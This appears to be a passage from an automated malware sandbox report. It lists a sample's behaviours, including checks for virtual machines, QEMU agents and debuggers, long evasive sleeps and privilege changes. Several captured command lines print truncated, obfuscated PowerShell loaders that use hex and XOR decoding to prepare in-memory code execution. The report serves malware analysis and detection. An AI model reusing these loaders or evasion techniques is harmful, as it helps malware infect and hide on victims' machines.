Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect Any.run
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 2768 Thread sleep count: 39 > 30 Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 2768 Thread sleep time: -39000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4204 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7516 Thread sleep count: 9929 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4204 Thread sleep time: -60000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9341 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8733 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Window / User API: threadDelayed 9929 Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_07526980 GetSystemInfo, 10_2_07526980
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe System information queried: ModuleInformation Jump to behavior
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process token adjusted: Debug Jump to behavior
Checks if the current process is being debugged
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 13_2_00B7E0F8 LdrInitializeThunk, 13_2_00B7E0F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Memory allocated: page read and write | page guard Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$badeanstalt = """refliuefnbrcextapihjostnbu hyhfltdubsp su{hi cl an pa bapinacarziasomvo(cz[pasdetalrcaiennougde]ca`$udhbasud)fr;ag at ud ho af`$usbeuyaktnoepasbo sa=sn thnanenowbo-muogrbepjloeddcbethu tobpayvrtseela[al]po bd(me`$vahtnsde.relpeenonvegmatunhsl re/sk di2gi)ko;un ge ma is gefflolerwi(fe`$haiop=om0pe;fu ma`$phido ge-maltitse fa`$syhbesba.dolunedenscgdotunhca;do un`$reiom+re=be2du)va{fl pl re ad ot ta sp sk ho`$dobfeydetleegassm[fi`$geiaf/na2de]od ge=sa tr[recskounnlivkresirortbr]il:me:datdiodibboypatglesu(po`$ushhesph.bosfruafbnesmatunrpriponungla(il`$stipa,su jo2po)ca,bl af1sn6du)no;ma te un`$mibkryprtchegtspa[du`$syiun/tr2fi]mi ta=ha ah(fo`$sibbiyintopeovsol[kb`$spihe/ar2fr]fe ci-frbrexenophrti hy2st2re9la)lo;so le de ca vr}re un[muskutsqrlaiapnnogbl]pe[maschyinsdetpaenemst.vatbaekaxibtbi.reemanplcgeourdprimonprgsy]si:ko:raaudsakcwaifoisa.mogbaebuttasgutunrfriulningba(ba`$fobseypittheansid)li;bl}ga`$dehbrdsaluncir0sk=krhoutbebaf ry'bebre6te9spcbe9be6pr9gr1js8et0am8in8secenbca8co1in8ta9pr8cr9de'sy;lu`$plhrvdaflfocin1de=trhditzibve un'feakr8re8tacde8sl6gr9ag7is8xyasv9sp6sh8caahe8de3bl9an1unctibtebab2ha8smcur8subcudbu6lkdti7macmebsebde0as8trbch9ah6me8to4pr8ne3fr8in0boarebra8st4ti9ve1un8apcop9dk3bi8co0suacl8an8en0un9in1mo8dedan8peaud8wu1ra9ca6ba'fo;el`$lohbldnolsucbo2ne=tnhbltunbsp ne'siafi2sk8ti0di9ul1tyblo5ob9fi7no8byace8an6poala4da8bi1ka8im1wh9gt7lo8ge0rr9br6br9di6ar'fl;gr`$cyheidarlblcpr3pr=ovhentnobco ta'lebun6re9upcgu9sn6gn9fa1br8mo0da8pr8lycovbbebwa7sk9fo0sa8mabde9ev1af8kacba8oc8sc8he0nocobbfoatocde8sibsi9se1be8or0se9no7fl8huaou9ty5rabco6kr8sk0dd9se7as9ri3le8lacbr8we6ou8di0oc9be6dackabteaundpu8se4st8isber8si1ja8ng9li8sp0fobdi7ci8ex0vi8st3sl'sk;de`$flhpedjaljdcti4ki=klhsttprbfo ge'th9fi6af9sy1af9re7he8crcwi8fobst8ov2be'bl;al`$anhindaclfocbu5ta=ovhdetwhbun ca'udade2sy8pi0in9af1caari8ha8prano8sl1py9du0gn8ki9ud8po0muaundne8no4ud8epbac8vi1bj8sp9st8op0an'af;se`$orhbydgrlcicfo6hm=cehsktinbha di'fabin7apbin1wabbe6em9re5sa8no0wo8ai6mi8micba8pa4sh8el9noastbfo8un4ko8om8lo8ro0stcfo9chcco5syajudag8afcco8in1ps8in0frami7se9lactabbr6er8ticap8hu2pocep9suclo5mibre5ps9no0wa8ko7st8sa9po8fuccr8eg6no'in;hu`$inhcadudlrocst7mi=rehprtrobze da'nebpa7ri9di0un8chbgn9ea1ku8skcme8pr8su8di0ovcka9mocsa5swaud8un8bl4si8dibly8un4ur8gl2fa8fi0wh8ne1sc'wa;dd`$dehopdselnocaz8tr=byhditsibpy ev'avbun7di8tr0om8in3ma8fr9pr8ud0pr8fe6tr9br1sl8mi0gr8in1biave1hy8sv0ur8hv9pl8bl0kl8ph2ni8se4fa9fy1xy8ch0na'sa;dr`$cohafddolvocen9nd=pihkotasbef in'psaprcgl8mubfeata8fo8kp0un8re8co8uname9bl7at9glcfoafr8ny8elami8ek1fy9st0ek8mi9he8vr0me're;sv`$resactinykarrekgoeartunrhynwaemu0ov=inhaltetbbo sk'skade8sh9decprash1ri8sc0va8re9ko8co0sc8da2st8af4by9sy1mi8af0subho1st9fecfl9an5ma8ob0cl'tr;fo`$besbatdiyanrsukreewatoprsunthest1ch=ashbetlibsk le'spama6hs8mo9no8da4ha9sa6ve9po6stcun9kocne5enbsq5pi9st0lo8rn7ch8tw9ud8brchy8fo6uncfu9rocph5prbpa6tm8fe0mi8or4bl8pr9ra8fa0pr8us1glcly9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "function htb { param([string]$hs); $bytes = new-object byte[] ($hs.length / 2); for($i=0; $i -lt $hs.length; $i+=2){ $bytes[$i/2] = [convert]::tobyte($hs.substring($i, 2), 16); $bytes[$i/2] = ($bytes[$i/2] -bxor 229); } [string][system.text.encoding]::ascii.getstring($bytes);}$hdlc0=htb 'b69c96918088cb818989';$hdlc1=htb 'a88c86978a968a8391cbb28c8bd6d7cbb08b96848380ab84918c9380a880918d8a8196';$hdlc2=htb 'a28091b5978a86a4818197809696';$hdlc3=htb 'b69c96918088cbb7908b918c8880cbac8b9180978a95b68097938c868096cbad848b818980b78083';$hdlc4=htb '9691978c8b82';$hdlc5=htb 'a28091a88a81908980ad848b818980';$hdlc6=htb 'b7b1b69580868c8489ab848880c9c5ad8c8180a79cb68c82c9c5b59087898c86';$hdlc7=htb 'b7908b918c8880c9c5a8848b84828081';$hdlc8=htb 'b78083898086918081a180898082849180';$hdlc9=htb 'ac8ba880888a979ca88a81908980';$styrketrne0=htb 'a89ca180898082849180b19c9580';$styrketrne1=htb 'a689849696c9c5b59087898c86c9c5b68084898081c9c5a48b968ca689849696c9c5a490918aa689849696';$styrketrne2=htb 'ac8b938a8e80';$styrketrne3=htb 'b59087898c86c9c5ad8c8180a79cb68c82c9c5ab8092b6898a91c9c5b38c9791908489';$styrketrne4=htb 'b38c9791908489a489898a86';$styrketrne5=htb '8b91818989';$styrketrne6=htb 'ab91b5978a91808691b38c9791908489a880888a979c';$styrketrne7=htb 'aca0bd';$styrketrne8=htb 'b9';function fkp {param ($v_m, $v_p) ;$leucifer0 =htb 'c193908b88c5d8c5cdbea49595a18a88848c8bb8dfdfa6909797808b91a18a88848c8bcba28091a49696808887898c8096cdccc599c5b28d809780c8aa878f808691c59ec5c1bacba2898a878489a49696808887899ca684868d80c5c8a48b81c5c1bacba98a8684918c8a8bcbb695898c91cdc1b6919c978e8091978b80ddccbec8d4b8cba09490848996cdc1ad818986d5ccc598cccba28091b19c9580cdc1ad818986d4cc';&($styrketrne7) $leucifer0;$leucifer5 = htb 'c1938497ba829584c5d8c5c193908b88cba28091a880918d8a81cdc1ad818986d7c9c5beb19c9580beb8b8c5a5cdc1ad818986d6c9c5c1ad818986d1cccc';&($styrketrne7) $leucifer5;$leucifer1 = htb '97809190978bc5c1938497ba829584cbac8b938a8e80cdc18b908989c9c5a5cdbeb69c96918088cbb7908b918c8880cbac8b9180978a95b68097938c868096cbad848b818980b78083b8cdab8092c8aa878f808691c5b69c96918088cbb7908b918c8880cbac8b9180978a95b68097938c868096cbad848b818980b78083cdcdab8092c8aa878f808691c5ac8b91b59197ccc9c5cdc193908b88cba28091a880918d8a81cdc1ad818986d0cccccbac8b938a8e80cdc18b908989c9c5a5cdc193ba88ccccccccc9c5c193ba95cccc';&($styrketrne7) $leucifer1;}function gdt {param ([parameter(position = 0, mandatory = $true)] [type[]] $var_parameters,[parameter(position = 1)] [type] $vrt = [void]);$leucifer2 = htb 'c1b3b1a7c5d8c5bea49595a18a88848c8bb8dfdfa6909797808b91a18a88848c8bcba180838c8b80a19c8b84888c86a49696808887899ccdcdab8092c8aa878f808691c5b69c96918088cbb78083898086918c8a8bcba49696808887899cab848880cdc1ad818986ddccccc9c5beb69c96918088cbb78083898086918c8a8bcba0888c91cba49696808887899ca7908c89818097a48686809696b8dfdfb7908bcccba180838c8b80a19c8b84888c86a88a81908980cdc1ad818986dcc9c5c
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$damspils = """refgrukonnacsktdoikloutnhe grhshtpubmi mi{g ud ho pr hvpflarurnoavamso(st[desbotorrmoiannbogph]di`$hihstsbl)ro;pa ni vn ra sa`$inbvoyuntalesisbe sp=af unnbregrwkr-byocabomjcyeuncbytor prbglyfotprest[be]av fa(fo`$alhdesst.milquerinpegbathahge te/un ev2me)ta;sm op fo st chfmookurun(sc`$haidr=di0pr;is ly`$haipo sn-ovlkitco dy`$flhspspe.gylskeoknbrgcatsahal;ko sp`$deitr+da=sk2ak)la{ma sp wh ko gu va st ba pt`$prbudysttauebesur[hy`$odist/kf2ar]re ka=de ku[abcfootonpavtoeudrcotfu]je:bo:sptstoskbglygrtpreur(su`$uihdesno.casprucobovspotwerhyilintrgcu(st`$maima,le di2my)in,pa pa1az6no)ju;co ba rn`$gabopytitstebosdi[au`$eliad/as2ma]pa ve=tr sh(ci`$spbaaytetoxebosin[ra`$maiom/ba2am]bo do-tibdixglomorpa en2fr0ba1om)he;au vg re mr as}mi mi[suskktturspifanmagov]en[grsinyhyscltcaestmin.sttpoeudxuntko.reeafnthcunotrdariunnregta]be:ka:ovaslstrcpaiexibr.digsaehatmisoutalrspitansugbi(me`$elbinyettinemassu)ci;by}mi`$inrhaegrcovagilsycteioptrhrriahitdieme0pi=lihomtexbov sn'ho9thasnbvi0vabaaarabcidplacocgyavo4opein7weakodpeaex5opafr5cu'bi;ge`$emrafebycdiaemluncheiaptrirexahetstebe1lb=guhdatgebsk le'di8rg4lyapr0inaviaspbrebboaco6sibslakoafi6scabrfmiblidsiemo7be9laeunast0biako7wrfcaaunfstbhoech7ra9chcpaabe7skbadapaatr8huakefskadockn8sk7maapr8robcrdfoape0meblafscajucno8te4boarecspbdiddeaun1biati6tuawedhebilari'im;ga`$horisemiccaachlpocfoitrtberdeafltfoexx2ma=ruhmetovbno pi'ru8lyeraaobcmybandun9in9anbidbbaahy6wiaspaun8pa8joabidflasvdfabdabciabichabjaaprbanafo'ju;sa`$mtrthehichyaunlcycseidetnorsnaebtteedy3ge=urhmatphbbu ex'si9adabebna0olbmiaskbbodbramucunaru4hoech7be9sybfobuscopaun7fabundspaop0haaan4kiarecsresm7ga8ro0doagl7tibfodglasicyobsubdeajo6flbai9af9maakiaspcsabfjbgabfrfbnasw0ovaweacuatectoblaaouefo7sa8se1inati8spaec7deafodsaaop5foaalcgi9cybfiareckladrffe'ko;be`$tormaeprcnoainlrecetimatinrwiakotaleex4ga=fohtitbabwe un'ovbtrahebindilbpybfaaev0koabe7amasteun'fo;co`$skrseevacobabrlincryidetgrrwhachtfoera5ba=cchsptanbpr au'in8vgefnapacypbmodom8kl4raamu6deacodhubhicsnahy5loagecud8th1trafl8inaen7taaundbuael5afakacre'un;af`$gardeebocmyamelmackvioptmirheatrtpaesa6pl=hehomtkibul ea'ku9svbub9lidge9neasubfe9foanaclaainaheafy0foakh8caatr5un8to7flaen8koahe4doabicdiebl5hieoi9ha8po1maafl0alataddiacicaf8gibspbca0ra9buaduaae0udacaesjetr5goeha9op9ma9stbexcwoastbkrarn5beafl0amaaraaf'uk;jo`$terbaerecnaaholdrcjeiomtimrouanotsoeko7re=suhxytrubta tr'na9libfobscchuade7aabgrdjuaca0foagi4anarecgleyo5maeka9or8mi4deain8moasj7euath8fuafoeimamecunabedgi'ty;do`$terflevacinameluocpuiovtwirleakntmnean8st=tihpatpabst st'tn9libchanoclyajoflyaas5diafacviadmabobcadopalvcgaahidpr8hadvaapocovapo5taanoccraprescaci8mebapdnoakacly'st;un`$smrfiesicseaseldicpaivatrarteapotreedr9ov=mehdotsibst ca'ta8os0glano7ro8ch4peatrcreaop4beast6aabaabilbal0en8st4hoafe6yearadlsbexcunaun5prapocde'fo;ro`$stdnoegomfgasugcynkiereteviamzpaalmbblludepl0co=pahaltagbki ma'ba8dr4nobsy0sa8todhuafrcteat
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$badeanstalt = """refliuefnbrcextapihjostnbu hyhfltdubsp su{hi cl an pa bapinacarziasomvo(cz[pasdetalrcaiennougde]ca`$udhbasud)fr;ag at ud ho af`$usbeuyaktnoepasbo sa=sn thnanenowbo-muogrbepjloeddcbethu tobpayvrtseela[al]po bd(me`$vahtnsde.relpeenonvegmatunhsl re/sk di2gi)ko;un ge ma is gefflolerwi(fe`$haiop=om0pe;fu ma`$phido ge-maltitse fa`$syhbesba.dolunedenscgdotunhca;do un`$reiom+re=be2du)va{fl pl re ad ot ta sp sk ho`$dobfeydetleegassm[fi`$geiaf/na2de]od ge=sa tr[recskounnlivkresirortbr]il:me:datdiodibboypatglesu(po`$ushhesph.bosfruafbnesmatunrpriponungla(il`$stipa,su jo2po)ca,bl af1sn6du)no;ma te un`$mibkryprtchegtspa[du`$syiun/tr2fi]mi ta=ha ah(fo`$sibbiyintopeovsol[kb`$spihe/ar2fr]fe ci-frbrexenophrti hy2st2re9la)lo;so le de ca vr}re un[muskutsqrlaiapnnogbl]pe[maschyinsdetpaenemst.vatbaekaxibtbi.reemanplcgeourdprimonprgsy]si:ko:raaudsakcwaifoisa.mogbaebuttasgutunrfriulningba(ba`$fobseypittheansid)li;bl}ga`$dehbrdsaluncir0sk=krhoutbebaf ry'bebre6te9spcbe9be6pr9gr1js8et0am8in8secenbca8co1in8ta9pr8cr9de'sy;lu`$plhrvdaflfocin1de=trhditzibve un'feakr8re8tacde8sl6gr9ag7is8xyasv9sp6sh8caahe8de3bl9an1unctibtebab2ha8smcur8subcudbu6lkdti7macmebsebde0as8trbch9ah6me8to4pr8ne3fr8in0boarebra8st4ti9ve1un8apcop9dk3bi8co0suacl8an8en0un9in1mo8dedan8peaud8wu1ra9ca6ba'fo;el`$lohbldnolsucbo2ne=tnhbltunbsp ne'siafi2sk8ti0di9ul1tyblo5ob9fi7no8byace8an6poala4da8bi1ka8im1wh9gt7lo8ge0rr9br6br9di6ar'fl;gr`$cyheidarlblcpr3pr=ovhentnobco ta'lebun6re9upcgu9sn6gn9fa1br8mo0da8pr8lycovbbebwa7sk9fo0sa8mabde9ev1af8kacba8oc8sc8he0nocobbfoatocde8sibsi9se1be8or0se9no7fl8huaou9ty5rabco6kr8sk0dd9se7as9ri3le8lacbr8we6ou8di0oc9be6dackabteaundpu8se4st8isber8si1ja8ng9li8sp0fobdi7ci8ex0vi8st3sl'sk;de`$flhpedjaljdcti4ki=klhsttprbfo ge'th9fi6af9sy1af9re7he8crcwi8fobst8ov2be'bl;al`$anhindaclfocbu5ta=ovhdetwhbun ca'udade2sy8pi0in9af1caari8ha8prano8sl1py9du0gn8ki9ud8po0muaundne8no4ud8epbac8vi1bj8sp9st8op0an'af;se`$orhbydgrlcicfo6hm=cehsktinbha di'fabin7apbin1wabbe6em9re5sa8no0wo8ai6mi8micba8pa4sh8el9noastbfo8un4ko8om8lo8ro0stcfo9chcco5syajudag8afcco8in1ps8in0frami7se9lactabbr6er8ticap8hu2pocep9suclo5mibre5ps9no0wa8ko7st8sa9po8fuccr8eg6no'in;hu`$inhcadudlrocst7mi=rehprtrobze da'nebpa7ri9di0un8chbgn9ea1ku8skcme8pr8su8di0ovcka9mocsa5swaud8un8bl4si8dibly8un4ur8gl2fa8fi0wh8ne1sc'wa;dd`$dehopdselnocaz8tr=byhditsibpy ev'avbun7di8tr0om8in3ma8fr9pr8ud0pr8fe6tr9br1sl8mi0gr8in1biave1hy8sv0ur8hv9pl8bl0kl8ph2ni8se4fa9fy1xy8ch0na'sa;dr`$cohafddolvocen9nd=pihkotasbef in'psaprcgl8mubfeata8fo8kp0un8re8co8uname9bl7at9glcfoafr8ny8elami8ek1fy9st0ek8mi9he8vr0me're;sv`$resactinykarrekgoeartunrhynwaemu0ov=inhaltetbbo sk'skade8sh9decprash1ri8sc0va8re9ko8co0sc8da2st8af4by9sy1mi8af0subho1st9fecfl9an5ma8ob0cl'tr;fo`$besbatdiyanrsukreewatoprsunthest1ch=ashbetlibsk le'spama6hs8mo9no8da4ha9sa6ve9po6stcun9kocne5enbsq5pi9st0lo8rn7ch8tw9ud8brchy8fo6uncfu9rocph5prbpa6tm8fe0mi8or4bl8pr9ra8fa0pr8us1glcly9 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "function htb { param([string]$hs); $bytes = new-object byte[] ($hs.length / 2); for($i=0; $i -lt $hs.length; $i+=2){ $bytes[$i/2] = [convert]::tobyte($hs.substring($i, 2), 16); $bytes[$i/2] = ($bytes[$i/2] -bxor 229); } [string][system.text.encoding]::ascii.getstring($bytes);}$hdlc0=htb 'b69c96918088cb818989';$hdlc1=htb 'a88c86978a968a8391cbb28c8bd6d7cbb08b96848380ab84918c9380a880918d8a8196';$hdlc2=htb 'a28091b5978a86a4818197809696';$hdlc3=htb 'b69c96918088cbb7908b918c8880cbac8b9180978a95b68097938c868096cbad848b818980b78083';$hdlc4=htb '9691978c8b82';$hdlc5=htb 'a28091a88a81908980ad848b818980';$hdlc6=htb 'b7b1b69580868c8489ab848880c9c5ad8c8180a79cb68c82c9c5b59087898c86';$hdlc7=htb 'b7908b918c8880c9c5a8848b84828081';$hdlc8=htb 'b78083898086918081a180898082849180';$hdlc9=htb 'ac8ba880888a979ca88a81908980';$styrketrne0=htb 'a89ca180898082849180b19c9580';$styrketrne1=htb 'a689849696c9c5b59087898c86c9c5b68084898081c9c5a48b968ca689849696c9c5a490918aa689849696';$styrketrne2=htb 'ac8b938a8e80';$styrketrne3=htb 'b59087898c86c9c5ad8c8180a79cb68c82c9c5ab8092b6898a91c9c5b38c9791908489';$styrketrne4=htb 'b38c9791908489a489898a86';$styrketrne5=htb '8b91818989';$styrketrne6=htb 'ab91b5978a91808691b38c9791908489a880888a979c';$styrketrne7=htb 'aca0bd';$styrketrne8=htb 'b9';function fkp {param ($v_m, $v_p) ;$leucifer0 =htb 'c193908b88c5d8c5cdbea49595a18a88848c8bb8dfdfa6909797808b91a18a88848c8bcba28091a49696808887898c8096cdccc599c5b28d809780c8aa878f808691c59ec5c1bacba2898a878489a49696808887899ca684868d80c5c8a48b81c5c1bacba98a8684918c8a8bcbb695898c91cdc1b6919c978e8091978b80ddccbec8d4b8cba09490848996cdc1ad818986d5ccc598cccba28091b19c9580cdc1ad818986d4cc';&($styrketrne7) $leucifer0;$leucifer5 = htb 'c1938497ba829584c5d8c5c193908b88cba28091a880918d8a81cdc1ad818986d7c9c5beb19c9580beb8b8c5a5cdc1ad818986d6c9c5c1ad818986d1cccc';&($styrketrne7) $leucifer5;$leucifer1 = htb '97809190978bc5c1938497ba829584cbac8b938a8e80cdc18b908989c9c5a5cdbeb69c96918088cbb7908b918c8880cbac8b9180978a95b68097938c868096cbad848b818980b78083b8cdab8092c8aa878f808691c5b69c96918088cbb7908b918c8880cbac8b9180978a95b68097938c868096cbad848b818980b78083cdcdab8092c8aa878f808691c5ac8b91b59197ccc9c5cdc193908b88cba28091a880918d8a81cdc1ad818986d0cccccbac8b938a8e80cdc18b908989c9c5a5cdc193ba88ccccccccc9c5c193ba95cccc';&($styrketrne7) $leucifer1;}function gdt {param ([parameter(position = 0, mandatory = $true)] [type[]] $var_parameters,[parameter(position = 1)] [type] $vrt = [void]);$leucifer2 = htb 'c1b3b1a7c5d8c5bea49595a18a88848c8bb8dfdfa6909797808b91a18a88848c8bcba180838c8b80a19c8b84888c86a49696808887899ccdcdab8092c8aa878f808691c5b69c96918088cbb78083898086918c8a8bcba49696808887899cab848880cdc1ad818986ddccccc9c5beb69c96918088cbb78083898086918c8a8bcba0888c91cba49696808887899ca7908c89818097a48686809696b8dfdfb7908bcccba180838c8b80a19c8b84888c86a88a81908980cdc1ad818986dcc9c5c Jump to behavior
